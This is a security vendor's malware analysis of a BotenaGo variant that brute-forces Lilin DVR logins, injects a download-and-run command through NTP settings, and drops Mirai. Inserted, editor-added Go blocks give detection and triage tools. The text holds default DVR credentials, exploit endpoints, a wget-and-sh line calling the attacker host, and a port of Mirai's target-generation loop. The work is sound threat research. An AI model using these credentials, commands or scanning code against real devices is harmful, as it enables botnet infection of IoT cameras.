NEW BOTENAGO VARIANT DISCOVERED BY NOZOMI NETWORKS LABS

by Nozomi Networks Labs on April 18, 2022

According to AT&T Alien Labs, the BotenaGo malware ships with over 30 exploit
functions, putting millions of IoT devices at risk of attack. BotenaGo is
written in Go, Google's open-source programming language. Open-source languages
have their benefits, but attackers take advantage of them just as readily, and
Go has become a common choice for writing malware.

This post describes Nozomi Networks Labs' discovery of a new BotenaGo variant
that specifically targets Lilin security camera DVRs. We named the sample
"Lillin scanner" after the path its developers used in the source code:
/root/lillin.go. Below we walk through its functionality step by step to show
how this kind of scanner works.



Figure 1. BotenaGo source code.

The source code of the BotenaGo malware (Figure 1) was leaked in October 2021,
which led to new variants built on the original. We decided to monitor for
samples that reuse parts of the BotenaGo source code, and in doing so we
discovered a sample that shares code with it.

At the time of this research, the sample was not detected by any engine on
VirusTotal (Figure 2). Although the binary is fairly large (2.8 MB), as Go
binaries tend to be, the malicious portion is small and focused on a single
task. Its authors removed almost all of the 30+ exploits present in BotenaGo's
original source code and reused some of the remaining code to exploit a
different vulnerability, one that was over two years old. That narrow focus may
be why the sample had not been detected until now.



Figure 2. The file is not detected as a threat.




LILLIN SCANNER FUNCTIONALITY

To run, the scanner/exploiter needs a single command-line parameter: the port it
will use to connect to each target IP address. Unlike BotenaGo, Lillin scanner
does not check the banner of the given IPs, so it is likely chained with another
tool that builds lists of Lilin devices using services such as Shodan or a mass
scanner.

The sample then iterates over the IP addresses it reads from standard input.
This portion of the code is easy to spot in the original BotenaGo source: it
creates one goroutine (Go's lightweight thread) per IP address, each executing
the infectFunctionLilinDvr function, which follows the same naming convention
as BotenaGo.



Figure 3. A loop creating Goroutines using the input from STDIN.



The presence of function-name strings and the absence of any packing or
obfuscation (many malware families use at least a modified version of UPX) show
that the binary makes no attempt to hide from security products or reverse
engineers. This supports the theory that the executable is mainly meant to be
run manually by the attackers.


DEVICE ACCESS AND VULNERABILITY EXPLOITATION

When infectFunctionLilinDvr receives an IP address to scan, it first checks
whether the device behind it can be accessed. Lillin scanner carries 11
username/password pairs in its code, whereas earlier samples reportedly abused
only root/icatch99 and report/8Jg0SR8K50. The credentials are stored
Base64-encoded, ready to be sent in the HTTP Basic authentication that the
Remote Code Execution (RCE) vulnerability requires.



Figure 4. Credentials used for bruteforce access to the DVRs.





Figure 5. Basic authentication attempt.



Lillin scanner loops over the 11 encoded credentials, requesting the web root of
the device with each one in turn by changing the Base64 string in the
Authorization header. When the server response contains the string HTTP/1.1 200
or HTTP/1.0 200, it treats the authentication as successful and moves on to
exploiting the Network Time Protocol (NTP) configuration vulnerability.
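The credential recovery shown in Figure 4 can be automated. The Go helper below is an added example written for this edit, not code from the post or from the BotenaGo code base: it scans a byte dump of a binary for Base64-looking runs, decodes each one and keeps only those that decode to a printable user:pass pair, which is exactly the shape of an HTTP Basic credential. The input blob is constructed for the example; it embeds the two credentials named above, the /root/lillin.go path from the post, and a few decoys that a naive Base64 grep would report.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
)

// Credential is one username/password pair recovered from the binary.
type Credential struct {
	User string
	Pass string
}

// sampleBlob is a constructed stand-in for a strings dump of the sample, not
// bytes from the real binary. It mixes two Base64 tokens that decode to
// "user:password" with tokens that must be rejected: a plain word, a path,
// a Base64 string without a colon, and an invalid token.
var sampleBlob = []byte("\x00\x01Authorization: Basic cm9vdDppY2F0Y2g5OQ==\x00" +
	"/root/lillin.go\x00" +
	"cmVwb3J0OjhKZzBTUjhLNTA=\x00" +
	"aGVsbG8gd29ybGQ=\x00" + // "hello world": valid Base64 but not a credential
	"bm90YmFzZTY0!!\x00")

// b64Token matches runs that look like standard Base64 (8+ characters, up to
// two '=' of padding). Shorter runs produce too many false positives.
var b64Token = regexp.MustCompile(`[A-Za-z0-9+/]{8,}={0,2}`)

// printableASCII reports whether every byte is printable 7-bit ASCII; real
// credentials decode to clean text, random Base64-valid bytes do not.
func printableASCII(s string) bool {
	for i := 0; i < len(s); i++ {
		if s[i] < 0x20 || s[i] > 0x7e {
			return false
		}
	}
	return true
}

// ExtractBasicCredentials returns every distinct "user:pass" pair found
// Base64-encoded in blob, in order of first appearance.
func ExtractBasicCredentials(blob []byte) []Credential {
	var out []Credential
	seen := map[string]bool{}
	for _, tok := range b64Token.FindAll(blob, -1) {
		dec, err := base64.StdEncoding.DecodeString(string(tok))
		if err != nil {
			continue // length not a multiple of 4, or bad padding
		}
		s := string(dec)
		colon := strings.IndexByte(s, ':')
		if colon <= 0 || !printableASCII(s) || seen[s] {
			continue
		}
		seen[s] = true
		out = append(out, Credential{User: s[:colon], Pass: s[colon+1:]})
	}
	return out
}

// BasicAuthHeader rebuilds the Authorization header value the scanner sends
// for a credential, which is the string a detection rule should match on.
func BasicAuthHeader(c Credential) string {
	return "Basic " + base64.StdEncoding.EncodeToString([]byte(c.User+":"+c.Pass))
}

func main() {
	for _, c := range ExtractBasicCredentials(sampleBlob) {
		fmt.Printf("%-8s %-12s %s\n", c.User, c.Pass, BasicAuthHeader(c))
	}
}
```

Run against a real dump (the output of `strings -n 8` on the sample, for instance) the same filter is what separates the 11 credential pairs from the thousands of other Base64-shaped runs a Go binary contains.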

This vulnerability, one of a set of security vulnerabilities affecting Lilin
DVRs, was discovered in 2020 and was assigned a CVSS v3.1 score of 10.0
(Critical) by the vendor.

The scanner sends specially crafted HTTP POST requests to the URL paths
/dvr/cmd and /cn/cmd in order to exploit a command injection vulnerability in
the web interface.

First, the scanner attempts to inject a command by submitting a POST request to
/dvr/cmd. If the request succeeds, it modifies the camera's NTP configuration so
that it contains a command which, because of the vulnerability, downloads a file
named wget.sh from the IP address 136.144.41[.]169 and immediately executes it.
If the injection via /dvr/cmd is not successful, the scanner repeats the same
attack against the /cn/cmd endpoint.

Once the attack is complete, a further request to the same endpoint restores the
original NTP configuration.
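Seen from the device's network, the sequence above is a run of Basic-auth attempts against / followed by a POST to /dvr/cmd or /cn/cmd whose configuration value carries a shell command. The Go example below is added for this edit, not code from the post: it parses raw HTTP requests with net/http and flags such a POST by three independent signals (shell metacharacters in the body, a download tool name, and the drop host named in the post). The requests are constructed, not captured traffic; the <ntp><server> body layout is a placeholder because the real request format (Figure 6) is not reproduced here, while the endpoints, the credential and 136.144.41.169 come from the post.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"net/http"
	"regexp"
	"strings"
)

// Finding describes one suspicious request.
type Finding struct {
	Path    string
	Reasons []string
}

var (
	// The two command endpoints the scanner posts to, per the post.
	targetPaths = map[string]bool{"/dvr/cmd": true, "/cn/cmd": true}
	// Characters that terminate one shell command and start another, or substitute output.
	shellMeta = regexp.MustCompile("[;|&`]|\\$\\(")
	// Download helpers typically present on BusyBox-based cameras.
	downloader = regexp.MustCompile(`\b(wget|curl|tftp|ftpget)\b`)
	// Infrastructure named in the post.
	iocHosts = []string{"136.144.41.169"}
)

// InspectRequest parses one raw HTTP request and returns a Finding when it is
// a POST to a command endpoint whose body carries an injected command.
// Requests to other paths, and clean configuration changes, yield nil.
func InspectRequest(raw string) (*Finding, error) {
	req, err := http.ReadRequest(bufio.NewReader(strings.NewReader(raw)))
	if err != nil {
		return nil, err
	}
	body, err := io.ReadAll(req.Body)
	if err != nil {
		return nil, err
	}
	if req.Method != http.MethodPost || !targetPaths[req.URL.Path] {
		return nil, nil
	}
	b := string(body)
	var reasons []string
	if shellMeta.MatchString(b) {
		reasons = append(reasons, "shell metacharacters inside a configuration value")
	}
	if downloader.MatchString(b) {
		reasons = append(reasons, "download tool invoked from a configuration value")
	}
	for _, h := range iocHosts {
		if strings.Contains(b, h) {
			reasons = append(reasons, "references known drop host "+h)
		}
	}
	if len(reasons) == 0 {
		return nil, nil
	}
	return &Finding{Path: req.URL.Path, Reasons: reasons}, nil
}

// InspectAll runs InspectRequest over a capture and keeps the hits.
func InspectAll(raws []string) ([]Finding, error) {
	var out []Finding
	for _, r := range raws {
		f, err := InspectRequest(r)
		if err != nil {
			return nil, err
		}
		if f != nil {
			out = append(out, *f)
		}
	}
	return out, nil
}

// rawPost builds a POST with a correct Content-Length so net/http reads the body.
func rawPost(path, body string) string {
	return fmt.Sprintf("POST %s HTTP/1.1\r\nHost: 192.0.2.10\r\n"+
		"Authorization: Basic cm9vdDppY2F0Y2g5OQ==\r\nContent-Length: %d\r\n\r\n%s",
		path, len(body), body)
}

// sampleCapture is constructed for this example. The <ntp><server> layout is a
// placeholder for the real request body shown in Figure 6 of the post.
var sampleCapture = []string{
	"GET / HTTP/1.1\r\nHost: 192.0.2.10\r\nAuthorization: Basic cm9vdDppY2F0Y2g5OQ==\r\n\r\n", // credential check
	rawPost("/dvr/cmd", "<ntp><server>pool.ntp.org</server></ntp>"),                              // legitimate change
	rawPost("/dvr/cmd", "<ntp><server>`wget http://136.144.41.169/wget.sh -O /tmp/w; sh /tmp/w`</server></ntp>"),
	rawPost("/cn/cmd", "<ntp><server>pool.ntp.org</server></ntp>"), // restore step
}

func main() {
	findings, err := InspectAll(sampleCapture)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s: %s\n", f.Path, strings.Join(f.Reasons, "; "))
	}
}
```

The restore request at the end of the sequence looks legitimate on its own, which is why the detection keys on the injected body rather than on the mere fact that the NTP setting changed; a run of 401 responses to / from the same source immediately before the POST is a useful corroborating signal when the web server's access log is available.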



Figure 6. POST request with the injected wget command.



The wget.sh script downloads, one after another, executables for multiple
architectures from 136.144.41[.]169. The targeted architectures are ARM,
Motorola 68000, MIPS, PowerPC, SPARC, SuperH and x86.
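When triaging the files wget.sh leaves behind, the first question is which binary is built for which CPU. The Go example below is added for this edit and is not code from the post: it reads only the ELF identification bytes and the e_machine field, which is enough to classify a payload even when the download was interrupted part-way, a case debug/elf.NewFile usually rejects because the section header table it wants sits at the end of the file. The headers it classifies are constructed stubs, not the real samples.

```go
package main

import (
	"debug/elf"
	"encoding/binary"
	"errors"
	"fmt"
)

// Arch is what a triage pass needs to know about a dropped binary before
// choosing an emulator or a disassembler.
type Arch struct {
	Name      string
	Bits      int
	BigEndian bool
}

// archNames maps ELF e_machine values to the families wget.sh targets, per the post.
var archNames = map[elf.Machine]string{
	elf.EM_ARM:     "ARM",
	elf.EM_AARCH64: "ARM",
	elf.EM_68K:     "Motorola 68000",
	elf.EM_MIPS:    "MIPS",
	elf.EM_PPC:     "PowerPC",
	elf.EM_PPC64:   "PowerPC",
	elf.EM_SPARC:   "SPARC",
	elf.EM_SH:      "SuperH",
	elf.EM_386:     "x86",
	elf.EM_X86_64:  "x86",
}

var ErrTruncated = errors.New("shorter than the ELF fields needed to identify the machine")

// Identify reads only e_ident and e_machine (the first 20 bytes of the file).
func Identify(b []byte) (Arch, error) {
	if len(b) < 20 {
		return Arch{}, ErrTruncated
	}
	if string(b[:4]) != elf.ELFMAG {
		return Arch{}, errors.New("not an ELF file")
	}
	var a Arch
	switch elf.Class(b[elf.EI_CLASS]) {
	case elf.ELFCLASS32:
		a.Bits = 32
	case elf.ELFCLASS64:
		a.Bits = 64
	default:
		return Arch{}, errors.New("unknown ELF class")
	}
	var bo binary.ByteOrder
	switch elf.Data(b[elf.EI_DATA]) {
	case elf.ELFDATA2LSB:
		bo = binary.LittleEndian
	case elf.ELFDATA2MSB:
		bo = binary.BigEndian
		a.BigEndian = true // mips vs mipsel is this bit, not e_machine
	default:
		return Arch{}, errors.New("unknown ELF data encoding")
	}
	m := elf.Machine(bo.Uint16(b[18:20]))
	name, ok := archNames[m]
	if !ok {
		return Arch{}, fmt.Errorf("machine %s is not one of the dropper's targets", m)
	}
	a.Name = name
	return a, nil
}

// fakeHeader builds the first 20 bytes of an ELF header; the rest of a real
// file is irrelevant to Identify. Constructed test data, not a real sample.
func fakeHeader(class elf.Class, data elf.Data, m elf.Machine) []byte {
	h := make([]byte, 20)
	copy(h, elf.ELFMAG)
	h[elf.EI_CLASS] = byte(class)
	h[elf.EI_DATA] = byte(data)
	h[elf.EI_VERSION] = byte(elf.EV_CURRENT)
	var bo binary.ByteOrder = binary.LittleEndian
	if data == elf.ELFDATA2MSB {
		bo = binary.BigEndian
	}
	bo.PutUint16(h[16:18], uint16(elf.ET_EXEC))
	bo.PutUint16(h[18:20], uint16(m))
	return h
}

// samples stands in for the files wget.sh would leave in /tmp on a camera.
var samples = map[string][]byte{
	"mips":      fakeHeader(elf.ELFCLASS32, elf.ELFDATA2MSB, elf.EM_MIPS),
	"mipsel":    fakeHeader(elf.ELFCLASS32, elf.ELFDATA2LSB, elf.EM_MIPS),
	"arm":       fakeHeader(elf.ELFCLASS32, elf.ELFDATA2LSB, elf.EM_ARM),
	"m68k":      fakeHeader(elf.ELFCLASS32, elf.ELFDATA2MSB, elf.EM_68K),
	"x86":       fakeHeader(elf.ELFCLASS32, elf.ELFDATA2LSB, elf.EM_386),
	"truncated": fakeHeader(elf.ELFCLASS32, elf.ELFDATA2LSB, elf.EM_SH)[:12],
	"notelf":    []byte("#!/bin/sh\nwget http://136.144.41.169/x\n"),
}

func main() {
	for name, b := range samples {
		a, err := Identify(b)
		if err != nil {
			fmt.Printf("%-10s %v\n", name, err)
			continue
		}
		fmt.Printf("%-10s %s %d-bit big-endian=%v\n", name, a.Name, a.Bits, a.BigEndian)
	}
}
```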



Figure 7. The content of wget.sh file.




THE MIRAI MALWARE FAMILY

In the third stage of the attack, the binaries for each architecture are
executed on the camera in turn; only the one built for the device's CPU will
actually run. These samples belong to the Mirai malware family, a widely known
threat to IoT devices. All of them were submitted to VirusTotal only recently
(at the beginning of March 2022). For the MIPS architecture, for example, two
samples have been identified as third-stage payloads belonging to the Mirai
family:

 * ae0185189e463c6abddf8865972dac72630b6e515e79d3f7566f0983a0eae295
 * 28f50f24c930b595f88257748f62d985436ecce1330ff52f09cdd13642591450



Figure 8. VirusTotal graph showing the connection between the two ELF samples
and the wget request contained in the wget.sh file.



For the x86 architecture, the file
62ef086111b6816d332e298d00ac946c11fac0ed8708fa2668ad3c91ceb96dbf is downloaded
and executed. Analysis of this sample reveals typical Mirai behaviors. For
example, while scanning for new devices, Mirai brute-forces authentication
using a list of hardcoded credentials. Figure 9 shows a non-exhaustive list of
the credentials used for the brute force, taken from the Mirai source code.



Figure 9. Non-exhaustive list of hardcoded credentials used by Mirai malware
from the source code.

Static analysis of the downloaded sample yields the list of credentials used by
its scanning module, many of which match those hardcoded in the Mirai source
code.



Figure 10. A portion of code from sample
62ef086111b6816d332e298d00ac946c11fac0ed8708fa2668ad3c91ceb96dbf using the same
credentials hardcoded in the source code.



Another behavior associated with the Mirai botnet is the exclusion from scanning
of IP ranges belonging to the U.S. Department of Defense (DoD), the U.S. Postal
Service (USPS), General Electric (GE), Hewlett-Packard (HP) and others. Some of
them are visible in Figure 11, which is taken from Mirai's source code.



Figure 11. Some of the IP ranges listed in the source code that are excluded
while scanning.



The sample we are analyzing excludes the same IP ranges from its scanning
routine. Moreover, the check applied to each randomly generated IP follows the
same algorithm as the one implemented in Mirai's source code.
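Porting that check to Go makes the fingerprint concrete. The block below is an added example, not code from the post or from the sample. Figure 11 is not reproduced here, so the ranges and comparisons are taken from the public Mirai scanner source (get_random_ip in scanner.c) as the editor recalls it, quirks included; verify them against your own copy. A defender can use the same list the other way round: a scanner whose observed targets never fall inside these ranges is very likely running Mirai-derived code.

```go
package main

import (
	"fmt"
	"math/rand"
	"net"
)

// Excluded reports whether Mirai's scanner would discard ip as a target.
// Reproduced from the public Mirai scanner.c (get_random_ip), not from
// Figure 11 of the post; the comparisons are kept as the original wrote them.
func Excluded(ip net.IP) bool {
	ip4 := ip.To4()
	if ip4 == nil {
		return true // Mirai only generates IPv4 targets
	}
	o1, o2 := ip4[0], ip4[1]
	switch {
	case o1 == 127 || o1 == 0: // loopback, "this" network
	case o1 == 3: // General Electric
	case o1 == 15 || o1 == 16: // Hewlett-Packard
	case o1 == 56: // US Postal Service
	case o1 == 10, o1 == 192 && o2 == 168, o1 == 172 && o2 >= 16 && o2 < 32: // RFC 1918
	case o1 == 100 && o2 >= 64 && o2 < 127: // carrier-grade NAT
	case o1 == 169 && o2 > 254: // meant to be 169.254/16; as written it skips 169.255/16 instead
	case o1 == 198 && o2 >= 18 && o2 < 20: // benchmarking
	case o1 >= 224: // multicast and reserved
	case o1 == 6, o1 == 7, o1 == 11, o1 == 21, o1 == 22, o1 == 26, o1 == 28,
		o1 == 29, o1 == 30, o1 == 33, o1 == 55, o1 == 214, o1 == 215: // Department of Defense
	default:
		return false
	}
	return true
}

// RandomTarget mirrors Mirai's loop: draw 32 random bits, split them into
// octets (low byte first, as the original does) and redraw until the address
// is outside the exclusion list.
func RandomTarget(r *rand.Rand) net.IP {
	for {
		v := r.Uint32()
		ip := net.IPv4(byte(v), byte(v>>8), byte(v>>16), byte(v>>24))
		if !Excluded(ip) {
			return ip
		}
	}
}

// SampleTargets generates n targets from a fixed seed, for reproducible checks.
func SampleTargets(seed int64, n int) []net.IP {
	r := rand.New(rand.NewSource(seed))
	out := make([]net.IP, 0, n)
	for i := 0; i < n; i++ {
		out = append(out, RandomTarget(r))
	}
	return out
}

// CountExcluded is the defender's side: over a set of targets observed from
// one scanning source, count how many fall in Mirai's excluded ranges. For a
// uniform random scanner the share is well above zero; for Mirai it is zero.
func CountExcluded(targets []net.IP) int {
	n := 0
	for _, t := range targets {
		if Excluded(t) {
			n++
		}
	}
	return n
}

func main() {
	targets := SampleTargets(1, 10000)
	fmt.Printf("%d of %d generated targets fall in excluded ranges\n", CountExcluded(targets), len(targets))
	for _, s := range []string{"3.1.2.3", "8.8.8.8", "169.254.1.1", "169.255.1.1"} {
		fmt.Printf("%-12s excluded=%v\n", s, Excluded(net.ParseIP(s)))
	}
}
```

The 169.254 comparison is worth a moment: because the original compares the second octet with `> 254`, link-local addresses are not actually skipped, so a scanner that does hit 169.254.0.0/16 is still consistent with Mirai-derived code.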



Figure 12. Portion of the sample code excluding some IP ranges while generating
the IPs to scan.



This tool appears to have been assembled quickly from the BotenaGo code base. It
should not be confused with a worm: its purpose is to infect the IP addresses
supplied as input with Mirai executables, and it cannot propagate on its own.


CONCLUSION

Beyond writing entirely new projects, attackers commonly reuse code that is
already available to build new malware. Monitoring the evolution of these
projects helps create more robust, generic detections that stay effective for
longer, and so provides better protection against modern cyber threats.
The post New BotenaGo Variant Discovered by Nozomi Networks Labs appeared first
on Nozomi Networks.

*** This is a Security Bloggers Network syndicated blog from Nozomi Networks
authored by Nozomi Networks Labs. Read the original post at:
https://www.nozominetworks.com/blog/new-botenago-variant-discovered-by-nozomi-networks-labs/